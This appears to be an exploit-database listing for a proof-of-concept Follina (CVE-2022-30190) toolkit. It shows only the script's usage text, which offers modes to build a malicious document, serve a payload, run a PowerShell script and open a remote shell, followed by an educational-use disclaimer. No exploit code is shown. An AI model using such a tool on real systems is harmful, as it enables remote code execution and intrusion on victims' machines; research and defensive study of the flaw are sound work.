Share
## https://sploitus.com/exploit?id=BAA0F684-952E-5B9E-B207-0419A33AC53B
# follina_cve_2022-30190
A proof of concept to CVE-2022-30190 (follina).
```
usage: exploit.py [-h] [-u HOST_IP] [-p PORT] [-o OFILE] [-m {server, create}]
                  [-s {script | script_file.ps1}] [-r HOST_IP:PORT]

Follina Exploitation Toolkit

options:
  -h, --help            show this help message and exit
  -u HOST_IP, --host HOST_IP
                        host ip address
  -p PORT, --port PORT  host port
  -o OFILE, --output OFILE
                        output file
  -m {server, create}, --mode {server, create}
                        operation mode - create doc file, run a server or both
  -s {script | script_file.ps1}, --script {script | script_file.ps1}
                        PS script for execution.
  -r HOST_IP:PORT, --remote HOST_IP:PORT
                        get a remote shell
```

**disclaimer!**: This tool was build for educational purposes only.